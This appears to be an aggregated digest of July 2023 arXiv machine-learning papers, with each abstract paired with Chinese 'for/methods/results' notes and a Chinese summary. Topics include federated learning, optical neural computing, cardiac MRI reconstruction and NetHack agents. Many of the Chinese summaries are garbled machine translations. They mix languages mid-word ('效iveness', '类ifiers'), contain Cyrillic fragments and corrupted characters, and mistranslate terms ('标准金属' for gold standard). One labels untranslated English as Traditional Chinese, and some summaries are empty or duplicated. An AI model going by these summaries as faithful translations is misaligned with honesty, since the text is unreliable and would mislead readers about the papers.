higher sensitivity, indicating potential for developing more effective depression scales. GPT has important potential in depression assessment, supporting clinicians and patients.

摘要
背景：抑郁是一种常见的心理疾病，带来社会和经济的负担。现在的诊断仍然基于自我报告和评估工具，这些工具的可靠性存在问题。需要更Objective的方法来诊断抑郁。目标：评估GPT技术在诊断抑郁方面的潜力。判断它能够模拟抑郁症状和调查不同程度的抑郁症状对响应。方法：使用三种抑郁相关的评估工具（HAMD-17、SDS、GDS-15）。进行两个实验，通过GPT对正常人和抑郁人群的响应进行模拟，与预期结果进行比较，评估它对抑郁症状的理解程度和不同情况下的表现差异。结果：GPT在抑郁诊断方面的表现被评估。它与正常人和抑郁人群的评分标准相符。有些情况下，随着抑郁的严重程度不同，GPT的表现会有所不同。GPT在感知度较高的评价工具上表现更好，表明GPT可能有助于开发更有效的抑郁评价工具。结论：GPT可以准确模拟正常人和抑郁人群在抑郁相关评估中的表现，但是在不同程度的抑郁中会出现一些差异。GPT在感知度较高的评价工具上表现更好，表明它可能有助于开发更有效的抑郁评价工具，支持临床医生和患者。

FedCME: Client Matching and Classifier Exchanging to Handle Data Heterogeneity in Federated Learning

paper_url: http://arxiv.org/abs/2307.08574
repo_url: None
paper_authors: Jun Nie, Danyang Xiao, Lei Yang, Weigang Wu
for: 本研究的目的是解决 federated learning 中的数据不同性问题，以提高模型的全球性性和性能。
methods: 本研究提出了一种新的 federated learning 框架，即 FedCME，通过客户端匹配和分类器交换来解决数据不同性问题。在本方法中，客户端的匹配和分类器交换可以更好地调整本地模型的训练方向，从而缓解本地更新偏移。此外，本研究还提出了一种特征对齐方法来增强特征提取器的训练。
results: 实验结果表明，FedCME 比 FedAvg、FedProx、MOON 和 FedRS 在 FMNIST 和 CIFAR10 等常用 federated learning 测试 benchmark 上表现更好，特别在数据不同性的情况下。

Abstract
Data heterogeneity across clients is one of the key challenges in Federated Learning (FL), which may slow down the global model convergence and even weaken global model performance. Most existing approaches tackle the heterogeneity by constraining local model updates through reference to global information provided by the server. This can alleviate the performance degradation on the aggregated global model. Different from existing methods, we focus the information exchange between clients, which could also enhance the effectiveness of local training and lead to generate a high-performance global model. Concretely, we propose a novel FL framework named FedCME by client matching and classifier exchanging. In FedCME, clients with large differences in data distribution will be matched in pairs, and then the corresponding pair of clients will exchange their classifiers at the stage of local training in an intermediate moment. Since the local data determines the local model training direction, our method can correct update direction of classifiers and effectively alleviate local update divergence. Besides, we propose feature alignment to enhance the training of the feature extractor. Experimental results demonstrate that FedCME performs better than FedAvg, FedProx, MOON and FedRS on popular federated learning benchmarks including FMNIST and CIFAR10, in the case where data are heterogeneous.

摘要
“数据不同性是联邦学习（FL）中的一个关键挑战，可能会 slow down 全球模型的融合和甚至弱化全球模型的性能。现有的方法通常通过对本地模型更新进行约束，通过服务器提供的全球信息进行参考。这可以减轻全球模型的性能下降。与现有方法不同，我们将注重客户端之间的信息交换，可以提高本地训练的效iveness，并通过生成高性能的全球模型。具体来说，我们提出了一种新的联邦学习框架，名为FedCME。在FedCME中，客户端之间的数据分布差异较大的将被匹配，并在本地训练阶段进行交换类型的分类器。由于本地数据决定本地模型训练方向，我们的方法可以正确更新类ifiers，有效地缓解本地更新偏移。此外，我们还提出了特征对齐来强化特征提取器的训练。实验结果表明，FedCME在FMNIST和CIFAR10等流行的联邦学习 benchmark 上表现比 FedAvg、FedProx、MOON 和 FedRS 更好，即使数据具有不同性。”

Revisiting the Robustness of the Minimum Error Entropy Criterion: A Transfer Learning Case Study

paper_url: http://arxiv.org/abs/2307.08572
repo_url: https://github.com/lpsilvestrin/mee-finetune
paper_authors: Luis Pedro Silvestrin, Shujian Yu, Mark Hoogendoorn
for: 本研究旨在探讨在实际任务中常见的分布偏移问题下，使用传输学习方法达到良好性能。
methods: 本研究使用了最小错误Entropy（MEE） criterion，一种广泛用于统计信号处理中对非高斯噪声的优化目标，并investigated its feasibility和usefulness在实际传输学习回归任务中。
results: 研究发现，通过简单地将基本传输学习算法中的MSE损失换为MEE，可以达到与现状技术传输学习算法相当的性能。

Abstract
Coping with distributional shifts is an important part of transfer learning methods in order to perform well in real-life tasks. However, most of the existing approaches in this area either focus on an ideal scenario in which the data does not contain noises or employ a complicated training paradigm or model design to deal with distributional shifts. In this paper, we revisit the robustness of the minimum error entropy (MEE) criterion, a widely used objective in statistical signal processing to deal with non-Gaussian noises, and investigate its feasibility and usefulness in real-life transfer learning regression tasks, where distributional shifts are common. Specifically, we put forward a new theoretical result showing the robustness of MEE against covariate shift. We also show that by simply replacing the mean squared error (MSE) loss with the MEE on basic transfer learning algorithms such as fine-tuning and linear probing, we can achieve competitive performance with respect to state-of-the-art transfer learning algorithms. We justify our arguments on both synthetic data and 5 real-world time-series data.

摘要
handle distributional shifts is an important part of transfer learning methods in order to perform well in real-life tasks. However, most of the existing approaches in this area either focus on an ideal scenario in which the data does not contain noises or employ a complicated training paradigm or model design to deal with distributional shifts. In this paper, we revisit the robustness of the minimum error entropy (MEE) criterion, a widely used objective in statistical signal processing to deal with non-Gaussian noises, and investigate its feasibility and usefulness in real-life transfer learning regression tasks, where distributional shifts are common. Specifically, we put forward a new theoretical result showing the robustness of MEE against covariate shift. We also show that by simply replacing the mean squared error (MSE) loss with the MEE on basic transfer learning algorithms such as fine-tuning and linear probing, we can achieve competitive performance with respect to state-of-the-art transfer learning algorithms. We justify our arguments on both synthetic data and 5 real-world time-series data.Here's the translation in Traditional Chinese:handle distributional shifts is an important part of transfer learning methods in order to perform well in real-life tasks. However, most of the existing approaches in this area either focus on an ideal scenario in which the data does not contain noises or employ a complicated training paradigm or model design to deal with distributional shifts. In this paper, we revisit the robustness of the minimum error entropy (MEE) criterion, a widely used objective in statistical signal processing to deal with non-Gaussian noises, and investigate its feasibility and usefulness in real-life transfer learning regression tasks, where distributional shifts are common. Specifically, we put forward a new theoretical result showing the robustness of MEE against covariate shift. We also show that by simply replacing the mean squared error (MSE) loss with the MEE on basic transfer learning algorithms such as fine-tuning and linear probing, we can achieve competitive performance with respect to state-of-the-art transfer learning algorithms. We justify our arguments on both synthetic data and 5 real-world time-series data.

Deep Learning with Passive Optical Nonlinear Mapping

paper_url: http://arxiv.org/abs/2307.08558
repo_url: None
paper_authors: Fei Xia, Kyungduk Kim, Yaniv Eliezer, Liam Shaughnessy, Sylvain Gigan, Hui Cao
for: 这项研究旨在开发一种基于光学加速器的 Deep Learning 系统，以提高人工智能的性能和能效性。
methods: 该研究使用了多散射在反射室中的技术，实现了无需加速器的光学非线性随机映射，以提高计算性能。
results: 研究发现，通过光学数据压缩和数字解码器，可以实现高性能、高压缩比的实时人体检测和其他计算任务。

Abstract
Deep learning has fundamentally transformed artificial intelligence, but the ever-increasing complexity in deep learning models calls for specialized hardware accelerators. Optical accelerators can potentially offer enhanced performance, scalability, and energy efficiency. However, achieving nonlinear mapping, a critical component of neural networks, remains challenging optically. Here, we introduce a design that leverages multiple scattering in a reverberating cavity to passively induce optical nonlinear random mapping, without the need for additional laser power. A key advantage emerging from our work is that we show we can perform optical data compression, facilitated by multiple scattering in the cavity, to efficiently compress and retain vital information while also decreasing data dimensionality. This allows rapid optical information processing and generation of low dimensional mixtures of highly nonlinear features. These are particularly useful for applications demanding high-speed analysis and responses such as in edge computing devices. Utilizing rapid optical information processing capabilities, our optical platforms could potentially offer more efficient and real-time processing solutions for a broad range of applications. We demonstrate the efficacy of our design in improving computational performance across tasks, including classification, image reconstruction, key-point detection, and object detection, all achieved through optical data compression combined with a digital decoder. Notably, we observed high performance, at an extreme compression ratio, for real-time pedestrian detection. Our findings pave the way for novel algorithms and architectural designs for optical computing.

摘要
A key advantage emerging from our work is that we show we can perform optical data compression, facilitated by multiple scattering in the cavity, to efficiently compress and retain vital information while also decreasing data dimensionality. This allows rapid optical information processing and generation of low-dimensional mixtures of highly nonlinear features. These are particularly useful for applications demanding high-speed analysis and responses such as in edge computing devices.Utilizing rapid optical information processing capabilities, our optical platforms could potentially offer more efficient and real-time processing solutions for a broad range of applications. We demonstrate the efficacy of our design in improving computational performance across tasks, including classification, image reconstruction, key-point detection, and object detection, all achieved through optical data compression combined with a digital decoder. Notably, we observed high performance, at an extreme compression ratio, for real-time pedestrian detection.Our findings pave the way for novel algorithms and architectural designs for optical computing.

Machine-Learning-based Colorectal Tissue Classification via Acoustic Resolution Photoacoustic Microscopy

paper_url: http://arxiv.org/abs/2307.08556
repo_url: None
paper_authors: Shangqing Tong, Peng Ge, Yanan Jiao, Zhaofu Ma, Ziye Li, Longhai Liu, Feng Gao, Xiaohui Du, Fei Gao
for: 检测肠癌的有效方法
methods: 使用机器学习基于ARPAM技术进行肠部细胞分类
results: 通过多种机器学习方法对肠部细胞进行分类，并对结果进行量化和质量分析以评估方法效果

Abstract
Colorectal cancer is a deadly disease that has become increasingly prevalent in recent years. Early detection is crucial for saving lives, but traditional diagnostic methods such as colonoscopy and biopsy have limitations. Colonoscopy cannot provide detailed information within the tissues affected by cancer, while biopsy involves tissue removal, which can be painful and invasive. In order to improve diagnostic efficiency and reduce patient suffering, we studied machine-learningbased approach for colorectal tissue classification that uses acoustic resolution photoacoustic microscopy (ARPAM). With this tool, we were able to classify benign and malignant tissue using multiple machine learning methods. Our results were analyzed both quantitatively and qualitatively to evaluate the effectiveness of our approach.

摘要
COLERECTAL CANCER 是一种致命的疾病，在最近几年内逐渐增加。早期检测是保存生命的关键，但传统的诊断方法，如colonoscopy和biopsy，有限制。colonoscopy无法提供癌变组织中的详细信息，而biopsy则需要组织切除，可能很痛苦和侵入性。为了改善诊断效率和减少患者的痛苦，我们研究了机器学习基于的抑制癌变组织分类方法，使用高分辨率光子振荡显微镜（ARPAM）。我们使用多种机器学习方法来分类健康和癌变组织。我们的结果经过了量化和质数分析，以评估我们的方法的有效性。

Multi-class point cloud completion networks for 3D cardiac anatomy reconstruction from cine magnetic resonance images

paper_url: http://arxiv.org/abs/2307.08535
repo_url: None
paper_authors: Marcel Beetz, Abhirup Banerjee, Julius Ossenberg-Engels, Vicente Grau
for: 这篇论文是为了提出一种全自动的三维心脏形态重建pipeline，用于从硬件磁共振成像（cine MRI）数据中提取多类三维心脏形态模型。
methods: 该ipeline使用了一种新型的多类点云完成网络（PCCN）来解决三维重建任务中的稀疏性和不对称性问题，并且在大量的Synthetic数据集上进行了评估。
results: 研究发现，使用PCCN可以在不同程度的扫描角度下实现下面或相似于原始图像分辨率的 Chamfer距离，并且相比于参考的3D U-Net模型，减少了32%和24%的重建误差。此外，该ipeline在UK Biobank研究中的1000个主题中实现了准确且 topological plausible的双心脏形态模型，并且与之前的文献中的临床指标相似。 finally, 研究发现该方法在多种常见异常条件下的稳定性。

Abstract
Cine magnetic resonance imaging (MRI) is the current gold standard for the assessment of cardiac anatomy and function. However, it typically only acquires a set of two-dimensional (2D) slices of the underlying three-dimensional (3D) anatomy of the heart, thus limiting the understanding and analysis of both healthy and pathological cardiac morphology and physiology. In this paper, we propose a novel fully automatic surface reconstruction pipeline capable of reconstructing multi-class 3D cardiac anatomy meshes from raw cine MRI acquisitions. Its key component is a multi-class point cloud completion network (PCCN) capable of correcting both the sparsity and misalignment issues of the 3D reconstruction task in a unified model. We first evaluate the PCCN on a large synthetic dataset of biventricular anatomies and observe Chamfer distances between reconstructed and gold standard anatomies below or similar to the underlying image resolution for multiple levels of slice misalignment. Furthermore, we find a reduction in reconstruction error compared to a benchmark 3D U-Net by 32% and 24% in terms of Hausdorff distance and mean surface distance, respectively. We then apply the PCCN as part of our automated reconstruction pipeline to 1000 subjects from the UK Biobank study in a cross-domain transfer setting and demonstrate its ability to reconstruct accurate and topologically plausible biventricular heart meshes with clinical metrics comparable to the previous literature. Finally, we investigate the robustness of our proposed approach and observe its capacity to successfully handle multiple common outlier conditions.

摘要
magnetic resonance imaging (MRI) 是当今心脏形态和功能评估的标准金属。然而，它通常只取得心脏三维形态的二维图像，因此限制了对健康和疾病心脏形态和physiology的理解和分析。在这篇论文中，我们提议一种全自动表面重建管道，可以从raw cine MRI获得多类三维心脏形态矩阵。其关键组件是一种多类点云完成网络（PCCN），可以在三维重建任务中解决缺失和不对称问题。我们首先在大量的人工数据集上评估PCCN，并观察到下同图像分辨率下的Chamfer距离。此外，我们发现与参考3D U-Net模型相比，PCCN可以降低重建错误的 Hausdorff距离和平均表面距离，分别降低32%和24%。然后，我们将PCCN作为自动重建管道的一部分应用于UK Biobank研究中的1000名参与者，并证明它能够重建准确和可靠的两个心脏宫室表面矩阵，与前一代文献的临床指标相符。最后，我们调查了我们提议的方法的稳定性，并发现它可以成功处理多种常见异常情况。

Nonlinear Processing with Linear Optics

paper_url: http://arxiv.org/abs/2307.08533
repo_url: None
paper_authors: Mustafa Yildirim, Niyazi Ulas Dinc, Ilker Oguz, Demetri Psaltis, Christophe Moser
for: 这个论文旨在实现多层光网络，并且解决在不使用电子组件的情况下实现多层光网络的挑战。
methods: 这篇论文提出了一种新的框架，使用多散射来实现可编程的线性和非线性变换，并且可以在低光功率 kontinuierender CW 光中实现非线性光计算。
results: 理论和实验研究表明，通过多散射重复数据可以实现低功率连续波光的非线性计算。

Abstract
Deep neural networks have achieved remarkable breakthroughs by leveraging multiple layers of data processing to extract hidden representations, albeit at the cost of large electronic computing power. To enhance energy efficiency and speed, the optical implementation of neural networks aims to harness the advantages of optical bandwidth and the energy efficiency of optical interconnections. In the absence of low-power optical nonlinearities, the challenge in the implementation of multilayer optical networks lies in realizing multiple optical layers without resorting to electronic components. In this study, we present a novel framework that uses multiple scattering that is capable of synthesizing programmable linear and nonlinear transformations concurrently at low optical power by leveraging the nonlinear relationship between the scattering potential, represented by data, and the scattered field. Theoretical and experimental investigations show that repeating the data by multiple scattering enables non-linear optical computing at low power continuous wave light.

摘要
文本翻译为简化中文：深度神经网络在数据处理多层级处理中提取隐藏表示的成就很大，但是需要大量电子计算能力。为了提高能效性和速度， оптиче实现神经网络寻求利用光波宽频带和光通信的优点。在缺乏低功率光非线性下，实现多层光网络的挑战在于不使用电子组件实现多个光层。本研究提出了一种新的框架，利用多散射实现可编程的线性和非线性变换，并在低光力连续波光下实现非线性光计算。理论和实验研究表明，通过多散射复制数据可实现低功率连续波光非线性计算。Here is the translation of the text into Simplified Chinese:深度神经网络在数据处理多层级处理中提取隐藏表示的成就很大，但是需要大量电子计算能力。为了提高能效性和速度， оптиче实现神经网络寻求利用光波宽频带和光通信的优点。在缺乏低功率光非线性下，实现多层光网络的挑战在于不使用电子组件实现多个光层。本研究提出了一种新的框架，利用多散射实现可编程的线性和非线性变换，并在低光力连续波光下实现非线性光计算。理论和实验研究表明，通过多散射复制数据可实现低功率连续波光非线性计算。

LuckyMera: a Modular AI Framework for Building Hybrid NetHack Agents

paper_url: http://arxiv.org/abs/2307.08532
repo_url: https://github.com/pervasive-ai-lab/luckymera
paper_authors: Luigi Quarantiello, Simone Marzeddu, Antonio Guzzi, Vincenzo Lomonaco
for: 这个论文的目的是提出一个可 configurable、可扩展的 AI 框架，用于在 NetHack 游戏中测试和训练 AI 代理人。
methods: 这个框架使用了 симвоlic 和神经网络学习方法，并提供了一些实用功能来保存经验和用于训练神经网络。
results: 经验证明，这个框架可以实现 state-of-the-art 的表现在完整的 NetHack 游戏中，并且提供了一个强大的基线代理人。

Abstract
In the last few decades we have witnessed a significant development in Artificial Intelligence (AI) thanks to the availability of a variety of testbeds, mostly based on simulated environments and video games. Among those, roguelike games offer a very good trade-off in terms of complexity of the environment and computational costs, which makes them perfectly suited to test AI agents generalization capabilities. In this work, we present LuckyMera, a flexible, modular, extensible and configurable AI framework built around NetHack, a popular terminal-based, single-player roguelike video game. This library is aimed at simplifying and speeding up the development of AI agents capable of successfully playing the game and offering a high-level interface for designing game strategies. LuckyMera comes with a set of off-the-shelf symbolic and neural modules (called "skills"): these modules can be either hard-coded behaviors, or neural Reinforcement Learning approaches, with the possibility of creating compositional hybrid solutions. Additionally, LuckyMera comes with a set of utility features to save its experiences in the form of trajectories for further analysis and to use them as datasets to train neural modules, with a direct interface to the NetHack Learning Environment and MiniHack. Through an empirical evaluation we validate our skills implementation and propose a strong baseline agent that can reach state-of-the-art performances in the complete NetHack game. LuckyMera is open-source and available at https://github.com/Pervasive-AI-Lab/LuckyMera.

摘要
在过去几十年中，人工智能（AI）领域已经经历了 significative 的发展，很大一部分归功于各种测试环境和游戏的可用性。 Among them, roguelike 游戏提供了一个非常好的复杂性环境和计算成本的trade-off，使其成为测试 AI 代理的 идеal 选择。在这项工作中，我们介绍了 LuckyMera，一个灵活、可模块化、可扩展和配置化的 AI 框架，基于 NetHack terminal 基于单player 游戏。这个库的目标是为 AI 代理的开发提供简单化和加速的方式，并提供一个高级接口来设计游戏策略。LuckyMera 包含一些固定的符号学模块（called "skills"）和神经网络学习方法，以及可创建compositional 混合解决方案。此外，LuckyMera 还提供了一些实用功能，以保存其经验为 trajectories 进行后续分析，并直接与 NetHack Learning Environment 和 MiniHack 进行交互。通过实验 validate 我们的技能实现，并提出了一个强大的基线代理，可以在完整的 NetHack 游戏中达到状态艺术表现。LuckyMera 是开源的，可以在 https://github.com/Pervasive-AI-Lab/LuckyMera 上获取。

Synthetic Lagrangian Turbulence by Generative Diffusion Models

paper_url: http://arxiv.org/abs/2307.08529
repo_url: https://github.com/smartturb/diffusion-lagr
paper_authors: Tianyi Li, Luca Biferale, Fabio Bonaccorso, Martino Andrea Scarpolini, Michele Buzzicotti
For: The paper aims to generate single-particle trajectories in three-dimensional turbulence at high Reynolds numbers using a machine learning approach.* Methods: The paper proposes a state-of-the-art Diffusion Model to generate the trajectories, which bypasses the need for direct numerical simulations or experiments to obtain reliable Lagrangian data.* Results: The model demonstrates the ability to quantitatively reproduce all relevant statistical benchmarks over the entire range of time scales, including the presence of fat tails distribution for the velocity increments, anomalous power law, and enhancement of intermittency around the dissipative scale. The model also exhibits good generalizability for extreme events, achieving unprecedented intensity and rarity.

Abstract
Lagrangian turbulence lies at the core of numerous applied and fundamental problems related to the physics of dispersion and mixing in engineering, bio-fluids, atmosphere, oceans, and astrophysics. Despite exceptional theoretical, numerical, and experimental efforts conducted over the past thirty years, no existing models are capable of faithfully reproducing statistical and topological properties exhibited by particle trajectories in turbulence. We propose a machine learning approach, based on a state-of-the-art Diffusion Model, to generate single-particle trajectories in three-dimensional turbulence at high Reynolds numbers, thereby bypassing the need for direct numerical simulations or experiments to obtain reliable Lagrangian data. Our model demonstrates the ability to quantitatively reproduce all relevant statistical benchmarks over the entire range of time scales, including the presence of fat tails distribution for the velocity increments, anomalous power law, and enhancement of intermittency around the dissipative scale. The model exhibits good generalizability for extreme events, achieving unprecedented intensity and rarity. This paves the way for producing synthetic high-quality datasets for pre-training various downstream applications of Lagrangian turbulence.

摘要
拉格朗日流动在许多应用和基础问题中扮演重要角色，包括物理杂化和混合在工程、生物流体、大气、海洋和astrophysics中。尽管过去三十年来有过 Exceptional theoretical, numerical, and experimental efforts，但现有的模型无法准确地复制流动中粒子轨迹的统计和 тополоڤ��IC Properties。我们提出一种基于当前最佳Diffusion Model的机器学习方法，可以在高 Reynolds 数下生成三维流动中的单粒子轨迹，并且不需要直接进行数值 simulate or experiment to obtain reliable Lagrangian data。我们的模型能够准确地复制所有有关时间尺度的统计标准，包括粒子增量的轮廓分布、罕见的功率律和在混合度下的增强。这种模型具有良好的通用性，能够生成extreme events，达到了历史上最高的Intensity和罕见性。这些Synthetic高质量数据可以用于PRE-TRAINING various downstream应用程序。

Multi-Domain Learning with Modulation Adapters

paper_url: http://arxiv.org/abs/2307.08528
repo_url: None
paper_authors: Ekaterina Iakovleva, Karteek Alahari, Jakob Verbeek
For: The paper is written for computer vision tasks, specifically for image classification across multiple domains.* Methods: The paper introduces Modulation Adapters, which update the convolutional filter weights of the model in a multiplicative manner for each task. The adaptation weights are parameterized in a factored manner, allowing for flexible scaling of the number of per-task parameters and different parameter-accuracy trade-offs.* Results: The approach yields excellent results on the Visual Decathlon challenge and the ImageNet-to-Sketch benchmark, with accuracies that are comparable to or better than those of existing state-of-the-art approaches.

Abstract
Deep convolutional networks are ubiquitous in computer vision, due to their excellent performance across different tasks for various domains. Models are, however, often trained in isolation for each task, failing to exploit relatedness between tasks and domains to learn more compact models that generalise better in low-data regimes. Multi-domain learning aims to handle related tasks, such as image classification across multiple domains, simultaneously. Previous work on this problem explored the use of a pre-trained and fixed domain-agnostic base network, in combination with smaller learnable domain-specific adaptation modules. In this paper, we introduce Modulation Adapters, which update the convolutional filter weights of the model in a multiplicative manner for each task. Parameterising these adaptation weights in a factored manner allows us to scale the number of per-task parameters in a flexible manner, and to strike different parameter-accuracy trade-offs. We evaluate our approach on the Visual Decathlon challenge, composed of ten image classification tasks across different domains, and on the ImageNet-to-Sketch benchmark, which consists of six image classification tasks. Our approach yields excellent results, with accuracies that are comparable to or better than those of existing state-of-the-art approaches.

摘要

Image Captions are Natural Prompts for Text-to-Image Models

paper_url: http://arxiv.org/abs/2307.08526
repo_url: None
paper_authors: Shiye Lei, Hao Chen, Sen Zhang, Bo Zhao, Dacheng Tao
for: 提高文本到图像生成模型的训练数据 Informative 性和多样性
methods: 使用高级captioning模型生成图像描述，并将描述与分类名称 concatenate 用作生成模型的训练数据
results: 对ImageNette、ImageNet-100和ImageNet-1K进行了广泛的实验，并 verify 了我们的方法可以significantly improve 模型在 sintetic 训练数据上的表现，即平均提高10%的分类精度。

Abstract
With the rapid development of Artificial Intelligence Generated Content (AIGC), it has become common practice in many learning tasks to train or fine-tune large models on synthetic data due to the data-scarcity and privacy leakage problems. Albeit promising with unlimited data generation, owing to massive and diverse information conveyed in real images, it is challenging for text-to-image generative models to synthesize informative training data with hand-crafted prompts, which usually leads to inferior generalization performance when training downstream models. In this paper, we theoretically analyze the relationship between the training effect of synthetic data and the synthetic data distribution induced by prompts. Then we correspondingly propose a simple yet effective method that prompts text-to-image generative models to synthesize more informative and diverse training data. Specifically, we caption each real image with the advanced captioning model to obtain informative and faithful prompts that extract class-relevant information and clarify the polysemy of class names. The image captions and class names are concatenated to prompt generative models for training image synthesis. Extensive experiments on ImageNette, ImageNet-100, and ImageNet-1K verify that our method significantly improves the performance of models trained on synthetic training data, i.e., 10% classification accuracy improvements on average.

摘要
随着人工智能生成内容（AIGC）的快速发展，在许多学习任务中通常是通过人工生成的数据进行训练或细化大型模型，因为实际数据的缺乏和隐私泄露问题。虽然人工生成的数据具有无限数据的优势，但是由于实际图像中含有庞大和多样化的信息， Text-to-image生成模型很难以通过手工提示生成有用的训练数据，这通常会导致下游模型训练时的泛化性能差。在这篇论文中，我们 theoretically 分析了人工生成数据训练效果和提示数据分布之间的关系，然后对应提出了一种简单 yet effective的方法。具体来说，我们使用高级描述模型将每个实际图像描述为 faithful 和有用的提示，以提取类别相关的信息并减少类名的多义性。图像描述和类别名称 concatenated 作为提示生成模型进行训练图像生成。我们在 ImageNette、ImageNet-100 和 ImageNet-1K 进行了广泛的实验，结果显示，我们的方法可以在使用人工生成数据进行训练时提高模型的性能，即平均提高10%的分类精度。

Results on Counterfactual Invariance

paper_url: http://arxiv.org/abs/2307.08519
repo_url: None
paper_authors: Jake Fawkes, Robin J. Evans
for: 本文提供了对Counterfactual invariants的理论分析。
methods: 文章presented a variety of existing definitions, studied their relationships and graphical implications.
results: 文章showed that counterfactual invariance implies conditional independence, but conditional independence does not provide any information about the likelihood of satisfying counterfactual invariance. Additionally, for discrete causal models, counterfactually invariant functions are often restricted to being functions of specific variables or constant.Here’s the same information in Traditional Chinese:
for: 本文的目的是提供Counterfactual invariants的理论分析。
methods: 文章使用了多种现有的定义，研究它们之间的关系和图形 implications。
results: 文章显示了Counterfactual invariance implies conditional independence, but conditional independence does not provide any information about the likelihood of satisfying counterfactual invariance. In addition, for discrete causal models, counterfactually invariant functions are often restricted to being functions of specific variables or constant.

Abstract
In this paper we provide a theoretical analysis of counterfactual invariance. We present a variety of existing definitions, study how they relate to each other and what their graphical implications are. We then turn to the current major question surrounding counterfactual invariance, how does it relate to conditional independence? We show that whilst counterfactual invariance implies conditional independence, conditional independence does not give any implications about the degree or likelihood of satisfying counterfactual invariance. Furthermore, we show that for discrete causal models counterfactually invariant functions are often constrained to be functions of particular variables, or even constant.

摘要
在本文中，我们提供了对Counterfactual invariants的理论分析。我们提供了多种现有的定义，研究它们之间的关系以及它们在图形上的含义。然后，我们转向现在主要关注的问题：Counterfactual invariants与Conditional independence之间的关系。我们表明，Counterfactual invariants imply Conditional independence,但Conditional independence不能提供关于满足Counterfactual invariants的度或概率的任何信息。此外，我们表明，对于排序 causal模型，Counterfactually invariants的函数frequently是特定变量或常数。

Kernel-Based Testing for Single-Cell Differential Analysis

paper_url: http://arxiv.org/abs/2307.08509
repo_url: https://github.com/anthoozier/kernel_testsda
paper_authors: Anthony Ozier-Lafontaine, Camille Fourneaux, Ghislain Durif, Céline Vallot, Olivier Gandrillon, Sandrine Giraud, Bertrand Michel, Franck Picard
for: 这种方法用于比较单个细胞中分子特征的分布, 例如基因表达和epigenomic修饰。
methods: 该方法基于kernel embedding的非线性比较框架, 可以进行单元细胞特征之间的 feature-wise 分析以及全面的 transcriptome 或 epigenome 比较, 考虑到它们的复杂依赖关系。
results: 该方法可以检测单元细胞中的不同类型 células, 并且可以成功地识别在分化过程中的细胞在转化过程中的阶段。此外，通过分析单元细胞 ChIP-Seq 数据, 该方法可以找到不受治疗的乳腺癌细胞中的 persistenter 细胞 под类型。

Abstract
Single-cell technologies have provided valuable insights into the distribution of molecular features, such as gene expression and epigenomic modifications. However, comparing these complex distributions in a controlled and powerful manner poses methodological challenges. Here we propose to benefit from the kernel-testing framework to compare the complex cell-wise distributions of molecular features in a non-linear manner based on their kernel embedding. Our framework not only allows for feature-wise analyses but also enables global comparisons of transcriptomes or epigenomes, considering their intricate dependencies. By using a classifier to discriminate cells based on the variability of their embedding, our method uncovers heterogeneities in cell populations that would otherwise go undetected. We show that kernel testing overcomes the limitations of differential analysis methods dedicated to single-cell. Kernel testing is applied to investigate the reversion process of differentiating cells, successfully identifying cells in transition between reversion and differentiation stages. Additionally, we analyze single-cell ChIP-Seq data and identify a subpopulation of untreated breast cancer cells that exhibit an epigenomic profile similar to persister cells.

摘要
单元技术提供了价值的内在分布的分析，如基因表达和聚合酶修饰。然而，对这些复杂的分布进行控制和有力的比较具有挑战性。我们提议利用kernel-测试框架来比较单元细胞水平的分布，以非线性方式基于其内存映射。我们的框架不仅允许特征值分析，而且允许全球比较单元胞营养或者聚合酶修饰，考虑其复杂的依赖关系。通过使用一个分类器来根据单元细胞的变化程度来识别单元细胞，我们的方法揭示了单元细胞群体中的异质性，这些异质性否则可能会被忽略。我们在研究单元细胞的还原过程中成功地使用kernel测试方法，并成功地识别在还原和分化过程中的单元细胞。此外，我们分析单元细胞ChIP-Seq数据，并发现一个未经治疗的乳腺癌细胞subpopulation，其聚合酶修饰profile与持续细胞类似。

Efficient and Accurate Optimal Transport with Mirror Descent and Conjugate Gradients

paper_url: http://arxiv.org/abs/2307.08507
repo_url: https://github.com/adaptive-agents-lab/mdot-pncg
paper_authors: Mete Kemertas, Allan D. Jepson, Amir-massoud Farahmand
for: 本文提出了一种新的优化运输算法，基于优化运输、投影下降和 conjugate gradients 等方法。
methods: 该算法可以计算优化运输成本，无论精度如何，而不会遇到数值稳定性问题。它利用 GPU 进行高效实现，并在许多情况下比传统算法 such as Sinkhorn’s Algorithm 更快 converges。
results: 我们对 marginal 分布 entropy 进行了特别关注，并证明高 entropy marginals 会导致更难的优化运输问题，而我们的算法适合这类问题。我们还进行了精心的减少分析，并对算法和问题参数进行了精心的调整。我们的结果表明，我们的算法可以为优化运输问题提供一个有用的工具。代码可以在 https://github.com/adaptive-agents-lab/MDOT-PNCG 上获取。

Abstract
We design a novel algorithm for optimal transport by drawing from the entropic optimal transport, mirror descent and conjugate gradients literatures. Our algorithm is able to compute optimal transport costs with arbitrary accuracy without running into numerical stability issues. The algorithm is implemented efficiently on GPUs and is shown empirically to converge more quickly than traditional algorithms such as Sinkhorn's Algorithm both in terms of number of iterations and wall-clock time in many cases. We pay particular attention to the entropy of marginal distributions and show that high entropy marginals make for harder optimal transport problems, for which our algorithm is a good fit. We provide a careful ablation analysis with respect to algorithm and problem parameters, and present benchmarking over the MNIST dataset. The results suggest that our algorithm can be a useful addition to the practitioner's optimal transport toolkit. Our code is open-sourced at https://github.com/adaptive-agents-lab/MDOT-PNCG .

摘要
我们设计了一种新的优化交通算法，基于优化交通、镜像下降和 conjugate gradients 文献。我们的算法可以计算优化交通成本，无论精度如何，而不会遇到数值稳定性问题。我们的算法可以高效地运行在 GPU 上，并在许多情况下被证明可以更快 converge than 传统的算法，如 sinkhorn 算法，以数 iteration 和墙 clock 时间来说。我们特别关注到 marginal 分布的 entropy，并证明高 entropy marginal 会导致更难的优化交通问题，而我们的算法适合这种情况。我们进行了仔细的减少分析，并对算法和问题参数进行了精心的调整。我们在 MNIST 数据集上进行了 benchmarking，结果表明，我们的算法可以成为优化交通工具箱中的有用工具。我们的代码可以在 https://github.com/adaptive-agents-lab/MDOT-PNCG 上获取。

Does Visual Pretraining Help End-to-End Reasoning?

paper_url: http://arxiv.org/abs/2307.08506
repo_url: None
paper_authors: Chen Sun, Calvin Luo, Xingyi Zhou, Anurag Arnab, Cordelia Schmid
for: investigate whether end-to-end learning of visual reasoning can be achieved with general-purpose neural networks, and confirm the feasibility of a neural network “generalist” to solve visual recognition and reasoning tasks.
methods: use a simple and general self-supervised framework which “compresses” each video frame into a small set of tokens with a transformer network, and reconstructs the remaining frames based on the compressed temporal context.
results: observe that pretraining is essential to achieve compositional generalization for end-to-end visual reasoning, and our proposed framework outperforms traditional supervised pretraining, including image classification and explicit object detection, by large margins.

Abstract
